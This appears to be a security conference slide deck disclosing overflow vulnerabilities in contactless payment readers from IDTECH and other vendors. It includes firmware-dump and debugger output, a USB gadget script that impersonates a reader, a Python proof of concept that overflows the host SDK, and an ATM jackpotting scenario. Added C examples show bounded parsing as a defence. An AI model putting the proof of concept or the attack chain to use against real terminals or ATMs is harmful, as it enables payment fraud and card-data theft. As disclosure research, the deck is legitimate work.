Contactless Overflow Code Execution

The document discusses vulnerabilities found in contactless payment readers through analyzing firmware and sending crafted application protocol data units (APDUs) over near field communication (NFC). Various techniques are described for extracting firmware from readers, analyzing the code to find vulnerable parsing of APDUs, and using custom Android apps and NFC hardware to send extended length APDUs to achieve code execution on vulnerable devices.

Uploaded by Daniel Romancik

CONTACTLESS OVERFLOW

Critical contactless vulnerabilities in NFC readers used in points of sale and ATMs.

ABOUT ME

• Reverse engineering. From bare-metal firmware to operating systems…
• HW hacker. Memory chip extractions, intra-board attacks, fault injection…
• Code review. Firmware, operating systems, server-client applications…
• I like to break stuff and face challenges, but also to find fixes and mitigations for my findings.

©2023 IOActive, Inc. All rights reserved.


AGENDA

• INTRODUCTION.
• IDTECH CASE.
• VULNERABLE DEVICES FROM OTHERS.
• IMPACT & WEAPONIZATION.
• ATM SCENARIO.


INTRODUCTION


INTRODUCTION
• Previous research:

Vulnerabilities in chip readers (not contactless):

PinPadPwn, 44con (2012)
https://www.youtube.com/watch?v=wY6Zxch0dJk

Cloning EMV transactions:

Crash and Pay: Owning and Cloning Payment Devices (2015)
https://www.blackhat.com/docs/us-15/materials/us-15-Fillmore-Crash-Pay-How-To-Own-And-Clone-Contactless-Payment-Devices.pdf

There appears to be no previous research on compromising payment readers over NFC.


INTRODUCTION
• How they work:

Block diagram of a reader: NFC chip & antenna connected to the main MCU.

Reference: http://index-of.es/Miscellanous/CONF%20SLIDES%20AND%20PAPER/us-15-Fillmore-Crash-Pay-How-To-Own-And-Clone-Contactless-Payment-Devices.pdf

• How they work: APDU (Application Protocol Data Unit)

https://www.openscdp.org/scripts/tutorial/emv/reademv.html
https://salmg.net/2017/09/12/intro-to-analyze-nfc-contactless-cards/

• What is really being sent over the air:
NFC native commands + APDU


CARD EMULATION
• How to emulate a card and send APDUs to the reader:

- Card emulation with an NFC chip (ACR122U, NXP PN532 chip)
- RFIDIOT.py
- Android app using Host Card Emulation.


IDTECH CASE
• Idtech: global leader in payment devices
https://idtechproducts.com/

• Idtech products:
- Magstripe, chip & contactless readers
- PIN pads
- OEM hardware
- Touchscreen displays
- Gaming readers

• Vulnerable readers:
- Code execution vulnerabilities in firmware:
  - Kiosk III
  - Kiosk IV
  - Vendi
  - VP8300
- Most likely the vulnerability is present in all devices.

• Where to find these vulnerable devices:
- Most Diebold/Wincor/NCR/Hyosung/Fujitsu ATMs


VULNERABILITIES (IDTECH)

Kiosk III firmware extraction: JTAG, Open On-Chip Debugger (OpenOCD) via telnet

telnet: connect to address ::1: Connection refused
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
> flash banks
#0 : kx.pflash0 (kinetis) at 0x00000000, size 0x00080000, buswidth 0, chipwidth 0
#1 : kx.pflash1 (kinetis) at 0x00000000, size 0x00000000, buswidth 0, chipwidth 0
> flash read_bank 0 kiosk3_dump 0 0x00080000
wrote 524288 bytes to file kiosk3_dump from flash bank 0 at offset 0x00000000 in 7.163636s (71.472 KiB/s)
> halt
target halted due to debug-request, current mode: Thread
xPSR: 0x81000000 pc: 0x000155e8 psp: 0x1fffd850
> reg
===== arm v7m registers
(0) r0 (/32): 0x1FFFDB7C
(1) r1 (/32): 0xB6D2C2C8
(2) r2 (/32): 0x02020202
(3) r3 (/32): 0x03030303
(4) r4 (/32): 0x04040404
(5) r5 (/32): 0x05050505
(6) r6 (/32): 0x06060606
(7) r7 (/32): 0x07070707
(8) r8 (/32): 0x08080808
(9) r9 (/32): 0x09090909
(10) r10 (/32): 0x10101010
(11) r11 (/32): 0x11111111
(12) r12 (/32): 0x12121212
(13) sp (/32): 0x1FFFD850
(14) lr (/32): 0x14141414
(15) pc (/32): 0x000155E8
VULNERABILITIES
Bare-metal firmware (no OS), no symbols, no strings.

ARM. Approx. 1600 functions.

VULNERABILITIES
• Locate where the code parses APDUs from the card:

1. Locate the memory address range of the peripheral that receives the data.

2. Look for the bytes that the reader sends to the card:

EMV PPSE (Proximity Payment System Environment):

2PAY.SYS.DDF01


VULNERABILITIES

If the second byte == 0x82, the next two bytes specify the size of the message (0xFFFF max).

What the hell?

If we are able to send an APDU bigger than 0x138 bytes we can control $PC!
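The length-form handling the slides describe (0x82 followed by a two-byte length of up to 0xFFFF, received into a 0x138-byte buffer), as an added example in C; this is not code from the talk or from any vendor's firmware. It decodes the BER-TLV length field in its short and long (0x81, 0x82) forms, which generalises the single 0x82 case shown on the slide, and refuses a frame whose declared length exceeds either the receive buffer or the bytes actually received. RX_BUF_SIZE, the function names, the status codes and the two sample frames are assumptions constructed for the example.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* Size of the fixed receive buffer the slides describe (0x138 bytes). */
#define RX_BUF_SIZE 0x138

/* Result codes for the bounded receive path (names are assumptions). */
enum rx_status {
    RX_OK = 0,
    RX_TRUNCATED = -1,   /* frame shorter than its header or declared length */
    RX_BAD_LENGTH = -2,  /* unsupported length form (0x80, 0x83 and above) */
    RX_TOO_BIG = -3      /* declared length exceeds the receive buffer */
};

/* Decode a BER-TLV length field starting at p[0].
 * Short form: one byte < 0x80. Long form: 0x81 + one byte, or 0x82 + two
 * bytes (big endian, up to 0xFFFF). Sets *len and *hdr (bytes consumed by
 * the length field). Returns RX_OK, RX_TRUNCATED or RX_BAD_LENGTH. */
int tlv_decode_length(const uint8_t *p, size_t avail, size_t *len, size_t *hdr)
{
    if (avail < 1) return RX_TRUNCATED;
    if (p[0] < 0x80) { *len = p[0]; *hdr = 1; return RX_OK; }
    if (p[0] == 0x81) {
        if (avail < 2) return RX_TRUNCATED;
        *len = p[1]; *hdr = 2; return RX_OK;
    }
    if (p[0] == 0x82) {
        if (avail < 3) return RX_TRUNCATED;
        *len = ((size_t)p[1] << 8) | p[2]; *hdr = 3; return RX_OK;
    }
    return RX_BAD_LENGTH;
}

/* Copy the value of a one-byte-tag TLV frame (tag, length, value) into dst,
 * refusing frames whose declared length does not fit the destination or the
 * bytes actually received. Returns bytes copied, or a negative rx_status. */
int rx_copy_tlv_value(uint8_t *dst, size_t dst_cap,
                      const uint8_t *frame, size_t frame_len)
{
    size_t len, hdr;
    if (frame_len < 2) return RX_TRUNCATED;       /* need tag + one length byte */
    int rc = tlv_decode_length(frame + 1, frame_len - 1, &len, &hdr);
    if (rc != RX_OK) return rc;
    if (len > dst_cap) return RX_TOO_BIG;         /* the check the slide's code lacks */
    if (len > frame_len - 1 - hdr) return RX_TRUNCATED;
    memcpy(dst, frame + 1 + hdr, len);
    return (int)len;
}

/* Constructed sample frames (not captured from any device). */
static const uint8_t sample_short[] = { 0x6F, 0x05, 0x84, 0x03, 'A', 'B', 'C' };
/* Claims 0xFFFF value bytes behind an 0x82 length form but carries only 4. */
static const uint8_t sample_oversized[] = { 0x6F, 0x82, 0xFF, 0xFF, 0x41, 0x41, 0x41, 0x41 };

/* Runs both samples through the bounded path; returns 1 when the short frame
 * copies its 5 value bytes and the oversized frame is rejected with RX_TOO_BIG. */
int rx_selftest(void)
{
    uint8_t buf[RX_BUF_SIZE];
    int a = rx_copy_tlv_value(buf, sizeof buf, sample_short, sizeof sample_short);
    int b = rx_copy_tlv_value(buf, sizeof buf, sample_oversized, sizeof sample_oversized);
    return a == 5 && b == RX_TOO_BIG;
}
```

The order of the two checks matters for what a caller learns: an oversized declaration is reported as RX_TOO_BIG before the frame is compared against the bytes on the wire, so a short frame that merely claims a huge length is still rejected for the right reason.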

VULNERABILITIES
How can we send an extended APDU?

Many NFC chips that support emulation don't support extended APDUs.

With the ACR122U you can only send a maximum of 0xFF bytes.

SOLUTION: Google Pixel to the rescue.

Create your own Android app using Host Card Emulation.


VULNERABILITIES
(gdb) x/20i $pc
=> 0x515a6: ldmia.w sp!, {r4, r5, r6, r7, r8, r9, r10, r11, pc}
0x515aa: nop
0x515ac: stc 0, cr2, [r8], {0}
0x515b0: ; <UNDEFINED> instruction: 0xb8b4
0x515b2: movs r6, r0
0x515b4: ; <UNDEFINED> instruction: 0xf6582000
0x515b8: strh r4, [r4, #44] ; 0x2c
0x515ba: movs r0, #0
0x515bc: stmdb sp!, {r4, r5, r6, r7, r8, r9, r10, r11, lr}
(gdb) ni
0x41414140 in ?? ()
(gdb) info reg
r0 0x0 0
r1 0x3 3
r2 0x10 16
r3 0x3 3
r4 0x41414141 1094795585
r5 0x41414141 1094795585
r6 0x41414141 1094795585
r7 0x41414141 1094795585
r8 0x41414141 1094795585
r9 0x41414141 1094795585
r10 0x41414141 1094795585
r11 0x41414141 1094795585
r12 0x9f544944 -1621866172
sp 0x1fff5a38 0x1fff5a38
lr 0x39b43 236355
pc 0x41414140 0x41414140

We can send 0xFFFF (about 65,000) bytes of ARM instructions to modify the firmware.
VULNERABILITIES
This stack buffer overflow is present in 21 different functions (Kiosk III firmware).

Reachable in other stages of an EMV transaction.

Vulnerability tested on the following devices:

Kiosk III bought from the HappyATMs shop.
Kiosk III, brand new, bought from IDtech.
Kiosk IV, brand new, bought from IDtech.
VP8300, brand new, bought from IDtech.

Video of Kiosk IV crashing.
Video of VP3300 crashing.


VULNERABLE VENDORS
• Using the same proof of concept used for IDTECH.
• Most of the biggest vendors had the same vulnerability.
• Stack buffer overflow & heap buffer overflow.
• Bare-metal firmware, RTOS, Android, Linux.


VULNERABLE DEVICES
• Ingenico: several Ingenico devices affected. (Ingenico video)
• Verifone: several Verifone devices affected.
• Crane Payment Innovations
• BBPOS
• WISEASY
• NEXGO


IMPACT
Reader firmware completely compromised:

• Modify firmware to change the price of current or future transactions.
• Modify firmware to steal future credit card info read by the reader.
• Modify firmware to attack the SDK running on the host connected over USB.

• Modify firmware to change the price of current or future transactions:

The price shown on the screen will be the original.

• Modify firmware to steal future credit card info read by the reader:

1. Only possible in contactless MSD (Magnetic Stripe Data) transactions.
2. MSD transactions: Track1 & Track2 (card number and expiration date).

• DEMO OF WEAPONIZED EXPLOIT.


IMPACT
• Modify firmware to attack the SDK running on the host connected over USB:

• IDtech's Universal SDK (Windows & Linux):

Idtech's SDK API in libidtechSDK.dll:

• Device_init ( )
• Get_firmware ( )
• Start_transaction ( )
• ….

• The attacker relies on the user's program calling a vulnerable SDK API in order to attack the HOST at any given time.

Device_init( ) is always used to start the communications. Best choice.

Once the attacker has compromised the firmware of the reader:

1. Disconnect the device from the HOST via software.
2. Reconnect; then libidtechSDK.dll device_init( ) will be called by the HOST.
IMPACT
• Device_init ( )
If it is a NEO device (specific VID & PID) then call device_setCurrentDevice( ).

• Device_setcurrentdevice ( )

a2 = s_device_type

• device_SendDataCommandNeo( )

DoIDGCMD_str( ) sends the USB payload to the reader and gets the response.

Based on the arguments received, DoIDGCMD_str( ) will not read more than 1024 bytes from the device.

The size of the memcpy (a6) is 2 bytes taken from the device response's message.

The source of the memcpy (&v14) is the payload received from the device.

But how big is the destination buffer (a5)? Let's go back to Device_setcurrentdevice( ).

• Device_setcurrentdevice ( )
&v9 is the buffer passed to device_SendDataCommandNEO( ).

v9 is at ebp-52h, which means that if the device's response is bigger than 0x56 bytes we can overflow the stack and overwrite the saved return address.
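A host-side counterpart for the SDK path described above, as an added example in C that is not IDTECH's SDK code: the response is assembled from 64-byte HID reports and capped at the 1024 bytes the slide attributes to DoIDGCMD_str(), and the two-byte length taken from the device is checked against both the bytes actually read and an explicit destination capacity before any copy, which is the check the memcpy into v9 lacks. The response framing (two header bytes, then a big-endian length), the report layout (one ID byte plus 63 data bytes), the constants and all function names are assumptions made for this example.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

#define REPORT_SIZE 64          /* HID report size used by the PoC on the slides */
#define DEV_READ_MAX 1024       /* read limit the slides attribute to DoIDGCMD_str() */
#define CALLER_BUF_SIZE 0x52    /* v9 lives at ebp-52h on the slide */

/* Hypothetical response framing assumed for this example (not IDTECH's):
 * bytes 0-1 header, bytes 2-3 big-endian payload length, then the payload.
 * Each 64-byte report is assumed to carry a 1-byte report ID then 63 data bytes. */
#define FRAME_HDR 4
#define REPORT_DATA (REPORT_SIZE - 1)

enum host_status {
    HOST_SHORT_FRAME = -1,      /* fewer bytes than the frame header */
    HOST_LEN_EXCEEDS_READ = -2, /* declared length longer than what was read */
    HOST_LEN_EXCEEDS_DST = -3   /* declared length longer than the caller's buffer */
};

/* Collect the data bytes of successive reports into resp, stopping at
 * DEV_READ_MAX. Returns the number of response bytes assembled. */
size_t assemble_reports(uint8_t *resp, const uint8_t *reports, size_t n_reports)
{
    size_t total = 0;
    for (size_t i = 0; i < n_reports; i++) {
        size_t take = REPORT_DATA;
        if (total + take > DEV_READ_MAX) take = DEV_READ_MAX - total;
        memcpy(resp + total, reports + i * REPORT_SIZE + 1, take);
        total += take;
        if (total == DEV_READ_MAX) break;
    }
    return total;
}

/* Bounded replacement for a memcpy whose size comes from the device: the
 * caller's capacity is an explicit parameter, and the declared length is
 * checked against both the bytes actually read and that capacity. */
int copy_device_payload(uint8_t *dst, size_t dst_cap,
                        const uint8_t *resp, size_t resp_len)
{
    if (resp_len < FRAME_HDR) return HOST_SHORT_FRAME;
    size_t declared = ((size_t)resp[2] << 8) | resp[3];
    if (declared > resp_len - FRAME_HDR) return HOST_LEN_EXCEEDS_READ;
    if (declared > dst_cap) return HOST_LEN_EXCEEDS_DST;
    memcpy(dst, resp + FRAME_HDR, declared);
    return (int)declared;
}

/* Build n constructed reports whose assembled frame declares `declared`
 * payload bytes, then run them through the bounded copy into a buffer the
 * size of v9. Returns copy_device_payload's result. */
int simulate_response(uint16_t declared, size_t n_reports)
{
    enum { MAX_REPORTS = 20 };
    uint8_t reports[MAX_REPORTS * REPORT_SIZE];
    uint8_t resp[DEV_READ_MAX];
    uint8_t dst[CALLER_BUF_SIZE];
    if (n_reports > MAX_REPORTS) n_reports = MAX_REPORTS;
    memset(reports, 0x41, sizeof reports);           /* constructed filler data */
    for (size_t i = 0; i < n_reports; i++)
        reports[i * REPORT_SIZE] = 0x03;             /* constructed report ID byte */
    reports[1] = 0x01;                                /* constructed header bytes */
    reports[2] = 0x02;
    reports[3] = (uint8_t)(declared >> 8);
    reports[4] = (uint8_t)(declared & 0xFF);
    size_t got = assemble_reports(resp, reports, n_reports);
    return copy_device_payload(dst, sizeof dst, resp, got);
}
```

With this contract a device that declares 0x200 payload bytes is refused with HOST_LEN_EXCEEDS_DST instead of running past the 0x52-byte buffer, and a device that declares more than the 1024 bytes the reader is ever allowed to return is refused with HOST_LEN_EXCEEDS_READ; only a declaration that fits both limits is copied.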

IMPACT
Attack chain

Attack the SDK using a Raspberry Pi & gadgetFS connected to the target (requires physical access to the USB port/cable).

GadgetFS config:

#!/bin/bash
modprobe libcomposite
cd /sys/kernel/config/usb_gadget/
mkdir g && cd g
echo 0x0ACD > idVendor
echo 0x4610 > idProduct
echo 0x0100 > bcdDevice # v1.0.0
echo 0x0200 > bcdUSB # USB2
mkdir -p strings/0x409
echo "643T0423400000" > strings/0x409/serialnumber
echo "ID TECH" > strings/0x409/manufacturer
echo "ID TECH Kiosk III" > strings/0x409/product
echo 0x00 > bDeviceClass
echo 0x00 > bDeviceSubClass
echo 0x00 > bDeviceProtocol
echo 0x0040 > bMaxPacketSize0
mkdir -p configs/c.1
mkdir configs/c.1/strings/0x409
echo 0 > configs/c.1/MaxPower
mkdir -p functions/hid.usb0
echo 0 > functions/hid.usb0/protocol
echo 255 > functions/hid.usb0/report_length
echo 0 > functions/hid.usb0/subclass
echo "0600FF0901A10185010600FF090126FF001500953F75088202010901920201850209018202010901920201850309018202010901920201850409018202010901920201C0" | xxd -r -ps > functions/hid.usb0/report_desc
echo 0xC0 > configs/c.1/bmAttributes
echo "Default Configuration" > configs/c.1/strings/0x409/configuration
ln -s functions/hid.usb0 configs/c.1
#mkdir -p functions/acm.usb0 # serial
#mkdir -p functions/rndis.usb0 # network
#ln -s functions/rndis.usb0 configs/c.1/
#ln -s functions/acm.usb0 configs/c.1/
udevadm settle -t 5 || :
ls /sys/class/udc/ > UDC


IMPACT
POC (Python 2, runs on the Raspberry Pi side of the HID gadget):

import os, binascii

dev = open("/dev/hidg0", 'wb+')

while True:
    # Read one 64-byte HID report from the host
    n = 64
    data = dev.read(n)
    rcv = binascii.hexlify(data)
    print rcv
    # Wait for the SDK's request, then answer with the crafted response
    if rcv == "015669564f74656368320001050000a3f90000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000":
        send = "\x02\x56\x69\x56\x4f\x74\x65\x63\x68\x32\x00\x01\x00\x03\xC0\xff\xe4\x01\x01\x9f\x06\x07\xa0\x00\x00\x00\x04\x10\x10\xff\xe1\x01\x01\xff\xe5\x01\x10\xff\xea\x01\x02\xff\xe3\x01\x74\xff\xe9\x0c\x02\x00\x01\x02\x20\x01\x02\x01\x01\x02\x09\x01\xff\xe2\x01\x03"
        os.write(dev.fileno(), send)
        print "HIT"
        # Filler reports that follow the response
        send = "\x03" + "\x41" * 63
        os.write(dev.fileno(), send)
        send = "\x03" + "\x42" * 63
        os.write(dev.fileno(), send)
        send = "\x03" + "\x43" * 63
        os.write(dev.fileno(), send)
        for _ in range(9):
            send = "\x03" + "\x44" * 63
            os.write(dev.fileno(), send)
        send = "\x04" + "\x44" * 63
        os.write(dev.fileno(), send)


IMPACT
POC: (screenshot of the HOST side)

More than 20 exploitable stack buffer overflows in the SDK.

Blog posts will cover some of the other ones with POCs and demos.


ATM SCENARIO
• More than 8 years of experience jackpotting ATMs:

ATM device drivers reverse engineering.
ATM device firmware reverse engineering.
USB communications reverse engineering.
XFS coding skills to jackpot.

Some of the most important worldwide ATM brands with contactless use Idtech readers:

NCR
WINCOR/DIEBOLD
FUJITSU
HYOSUNG

US ATMs use contactless MSD to read the card (if the card supports it): Track1/Track2.

ATM jackpot:

Compromise of the ATM computer:

• Exploiting vulnerabilities in the SDK/driver responsible for the NFC reader comms.
• Exploiting vulnerabilities in other USB drivers/software running in the ATM, acting as another device (modifying the VID & PID of the firmware).

ATM computer compromised: ATM jackpot.

No demos can be shown (NDAs involved).

Can't specify which ATM vendor I tested (driver).

If you have concerns:

- Check whether your ATM NFC reader is still vulnerable.
- Check the driver/SDK used to communicate with the NFC reader.


DISCLOSURE:

• We contacted all affected vendors.
• All of them said they fixed the issues.
• We tested some fixes provided to us, but not from all vendors.
• We waited almost 2 years to give time to patch the affected devices.


QUESTIONS:

Thank you.

[email protected]